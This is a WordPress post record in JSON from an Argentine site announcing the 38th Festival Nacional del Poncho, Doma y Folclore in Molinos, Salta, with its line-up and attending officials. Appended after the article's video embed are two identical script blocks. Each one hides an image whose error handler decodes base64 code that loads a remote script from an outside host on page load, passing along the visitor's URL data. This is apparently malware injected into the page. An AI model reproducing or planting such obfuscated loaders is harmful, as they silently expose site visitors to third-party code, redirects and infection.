{"id":2076,"date":"2023-01-11T11:32:37","date_gmt":"2023-01-11T14:32:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2076"},"modified":"2025-08-14T00:25:40","modified_gmt":"2025-08-14T03:25:40","slug":"el-festival-nacional-del-poncho-doma-y-folclore-de-molinos-se-realizara-el-27-y-28-de-enero-2","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2076","title":{"rendered":"El Festival Nacional del Poncho, Doma y Folclore de Molinos se realizar\u00e1 el 27 y 28 de enero"},"content":{"rendered":"\n<h4 class=\"has-black-color has-text-color has-background wp-block-heading\" style=\"background-color:#f14c75\"><strong><em>En la 38\u00b0 Edici\u00f3n, participar\u00e1n importantes grupos musicales y ballets folcl\u00f3ricos; para la doma nocturna se esperan jinetes y tropillas de todo el pa\u00eds.<\/em><\/strong><\/h4>\n\n\n\n<p>El municipio de Molinos present\u00f3 esta ma\u00f1ana la XXXVIII Edici\u00f3n del Festival Nacional del Poncho, Doma y Folclore que se realizar\u00e1 el 27 y 28 de enero y contar\u00e1 con una importante cartelera de artistas y destacados jinetes, inform\u00f3 el intendente Walter Chocobar quien estuvo acompa\u00f1ado por la secretaria de Turismo Nadia Loza.<\/p>\n\n\n\n<p>Asimismo, Chochobar se refiri\u00f3 a la importancia de Molinos en los Valles, \u201cpara nosotros es vital el trabajo que se est\u00e1n haciendo en las rutas para que m\u00e1s gente llegue a conocer Molinos y a participar del Festival. Por su parte, Nadia Loza resalt\u00f3 el esfuerzo del municipio para realizar un festival de primer nivel y asegur\u00f3: \u201cpara turistas y salte\u00f1os es una oportunidad de conocer este pueblo maravilloso, su asociaci\u00f3n de artesanos, el Centro de Interpretaci\u00f3n, el Museo de la Luz y los vi\u00f1edos m\u00e1s altos del mundo\u201d.&nbsp;<\/p>\n\n\n\n<p>El viernes 27 actuar\u00e1n Santo Torres, L\u00e1zaro Caballero, Dalmiro Cu\u00e9llar y cerrar\u00e1 el grupo Ternura. En tanto, el s\u00e1bado 28 se disfrutar\u00e1 de grupos de ballet con 60 bailarines en el campo y participar\u00e1n Alma Chaque\u00f1a, Guitarreros, Chirete y Los Jarkas; a la noche se realizar\u00e1 la doma con tropillas y jinetes de todo el pa\u00eds.<\/p>\n\n\n\n<p>Estuvieron presentes: el secretario de Gobierno de Molinos Mariano Gonz\u00e1lez, el presidente del Fort\u00edn de Molinos Jorge Renfijes, el presidente\u00a0y secretario Agrupaci\u00f3n Tradicionalista de Salta Gauchos de G\u00fcemes\u00a0Julio de los R\u00edos y Agust\u00edn Monge, respectivamente; Juan Carlos Dambrosio de la Asociaci\u00f3n de Jinetes y Tropilleros Salte\u00f1os y Enriqueta Vel\u00e1zquez Embajadora de la Empanada salte\u00f1a al haber obtenido el 3er puesto en el Concurso Provincial de la empanada.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Festival Nacional del Poncho, Doma y Folclore de Molinos se realizar\u00e1 el 27 y 28 de enero\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/D003jktMkhw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la 38\u00b0 Edici\u00f3n, participar\u00e1n importantes grupos musicales y ballets folcl\u00f3ricos; para la doma nocturna se esperan jinetes y tropillas de todo el pa\u00eds. El municipio de Molinos present\u00f3 esta ma\u00f1ana la XXXVIII Edici\u00f3n del Festival Nacional del Poncho, Doma y Folclore que se realizar\u00e1 el 27 y 28 de enero y contar\u00e1 con una [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2077,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,13,17],"tags":[],"class_list":{"0":"post-2076","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-festivales","9":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2076"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2076"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2076\/revisions"}],"predecessor-version":[{"id":7210,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2076\/revisions\/7210"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2077"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2076"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2076"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2076"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}